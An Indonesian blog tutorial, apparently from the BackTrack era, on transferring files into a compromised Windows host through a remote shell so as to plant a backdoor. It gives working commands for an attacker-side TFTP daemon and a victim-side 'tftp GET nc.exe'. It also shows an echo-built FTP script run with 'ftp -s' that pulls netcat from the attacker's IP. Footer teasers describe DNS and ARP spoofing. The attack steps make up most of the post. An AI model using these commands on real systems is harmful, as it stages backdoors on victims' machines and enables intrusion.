Langsung ke konten utama

Transferring Files

Setelah kita mendapatkan sebuah Shell, lalu apa yang dapat kita lakukan? Satu pertanyaan dengan seribu jawaban (lebayyyy... :p ). Hahaha... ya iyalah... dengan remote shell, kita hampir dapat mengeksekusi seluruh administrative command, seperti menambah user, mengganti password, instal aplikasi, mengubah konfigurasi, dan lain-lain.

Sebelum malangkah ke topik pembahasan, ada baiknya kita sama-sama mengerti akan pengertian dari interactive dan non interactive shell, dengan memperhatikan contoh berikut:

  1. Buka command prompt pada windows, lalu ketikkan perintah "dir". Perintah tersebut dapat dikatakan sebagai non-interactive shell dikarenakan saat perintah tersebut pertama kali di eksekusi, tidak membutuhkan input perintah lain dari user untuk menyelesaikan perintah tersebut.
  2. Salah satu bentuk interactive shell  adalah saat akan melakukan proses transfer file dengan menggunakan FTP. Dimana kita harus mengetikkan username, password dan perinh upload atau download file.
Salah satu peraturan dasar dalam remote shell, yaitu:

"Jangan menjalankan interaktive programs menggunakan remote shell"

Silahkan dicoba sendiri, pasti Anda tidak akan berhasil dan mendapat respon time out dari server.



Salah satunya adalah dengan melakukan transferring files untuk memasang backdoor pada komputer korban. Ada dua metode yang dapat kita lakukan untuk melakukan  transferring file, yaitu:

1. Menggunakan TFTPD

Pada metode ini, kita memanfaatkan Backtrack sebagai server TFTPD. Untuk mengaktifkan services TFTPD pada backtrack kita adalah sebagai berikut:

root@BT:~# atftpd --daemon --port 69 /tmp

Kemudian untuk memastikan bahwa service telah berjalan, ketikkan perintah berikut:

root@bt:~# netstat -anu |grep 69
udp        0      0 0.0.0.0:69              0.0.0.0:*

Selanjutnya, lakukan copy file yang akan ditransferke komputer korban ke direktori /tmp pada komputer attacker.

root@bt:~# cp /pentest/windows-binaries/tools/nc.exe /tmp/

lalu lakukan transfer file pada komputer korban melalui remote shell yang telah kita peroleh sebelumnya. Sebagai catatan, IP 192.168.136.128 adalah IP dari komputer attacker yang berperan sebagai TFTP Server.

C:\>tftp -i 192.168.136.128 GET nc.exe
tftp -i 192.168.136.128 GET nc.exe
Transfer successful: 59392 bytes in 1 second, 59392 bytes/s

C:\>dir nc.exe
dir nc.exe
 Volume in drive C has no label.
 Volume Serial Number is 9498-679D

 Directory of C:\

12/27/2011  02:02 PM            87,040 nc.exe
               1 File(s)         87,040 bytes
               0 Dir(s)   6,297,440,256 bytes free

C:\>

Metode TFTP memiliki beberapa keuntungan dan kendala, yaitu:
  1. Dikarenakan proses TFTP berbasiskan koneksi UDP dan lebih cepat dalam proses transfer data, maka sangat disarankan menggunakan metode TFTP untuk transfer file dengan ukuran yang kecil
  2. Kelemahannya adalah karena berbasiskan UDP, maka ada kemungkinan proses transfer file menjadi tidak sempurna
  3. Selain itu banyak perusahaan/organisasi yang tidak mengijinkan perpindahan data dengan  koneksi UDP yang telah di blok oleh firewall masing-masing user


2. Menggunakan FTP

Bagaiman caranya agar kita dapat melakukan transfer file dengan FTP melalui remote shell, sedangkan sama-sama kita pahami kita tidak bisa melakukan interactive command dengan menggunakan remote shell?


Ternyata, salah satu fitur dari perintah FTP adalah dapat menjalankan perintah FTP dari sebuah file txt. Oke langsung saja... Gunakan kembali remote shell yang telah diperoleh sebelumnya, ketikkan perintah berikut:

C:\>echo open 192.168.136.128 21> ftp.txt
C:\>echo username >>ftp.txt
C:\>echo password >>ftp.txt
C:\>echo bin>> ftp.txt
C:\>echo get nc.exe >> ftp.txt
C:\>echo bye >> ftp.txt
C:\>ftp -s:ftp.txt

Untuk username dan password diisi dengan username dan password untuk login ke FTP Server. Sekedar catatan, pada aplikasi backtrack saya menggunakan FTP Server Vsftpd.

Tadaaaa.... silahkan cek sendiri apakah di folder komputer korban sudah ada file nc.exe :D

Komentar

Postingan populer dari blog ini

Instalasi Netcat Di Windows

Saat ini aplikasi netcat sudah dapat berjalan dengan baik di atas platform Windows. Secara default, OS BackTrack telah menyediakan aplikasi Netcat. Tapi buat yang pengen jalanin netcat di windows, bisa download di sini  dan berikut proses instalasinya. Tidak ada perbedaan jenis perintah antara aplikasi netcat yg berjalan di atas platform Linux maupun Windows.

DNS Spoofing

DNS Spoofing adalah salah satu metode hacking Man In The Middle Attack (MITM). Hampir sama konsepnya dengan ARP Spoofing, tapi yang membedakan adalah Attacker akan memalsukan alamat IP dari sebuah domain. DNS adalah Domain Name Server, yaitu server yang digunakan untuk mengetahui IP Address suatu host lewat host name-nya. Dalam dunia internet, komputer berkomunikasi satu sama lain dengan mengenali IP Address-nya. Namun bagi manusia tidak mungkin menghafalkan IP address tersebut, manusia lebih mudah menghapalkan kata-kata seperti www.yahoo.com, www.google.com, atau www.facebook.com. DNS berfungsi untuk mengkonversi nama yang bisa terbaca oleh manusia ke dalam IP addresshost yang bersangkutan untuk dihubungi. Jadi ketika target melakukan request terhadap sebuah alamat domain dengan alamat IP A, dengan DNS Spoofing, oleh gateway request user tersebut akan di forward ke alamat IP palsu dari attacker. Oke, saatnya kita kita mencoba melakukan DNS Spoofing dengan menggunakan aplikasi

ARP Spoofing (Soft Way)

Jika artikel saya sebelumnya mencoba menjelaskan langkah-langkah melakukan ARP Spoofing dengan cara konvensional tanpa bantuan tools khusus (istilah lebay nya hard way ), kali ini saya akan mencoba lagi berbagi cara melakukan ARP Spoofing dengan menggunakan tool ARP Spoofing yaitu Ettercap. ARP Spoofing adalah sebuah teknik penyadapan oleh pihak ketiga yang dilakukan dalam sebuah jaringan LAN. Dengan metode tersebut,  attacker  dapat menyadap transmisi, modifikasi trafik, hingga menghentikan trafik komunikasi antar dua mesin yang terhubung dalam satu jaringan lokal (LAN).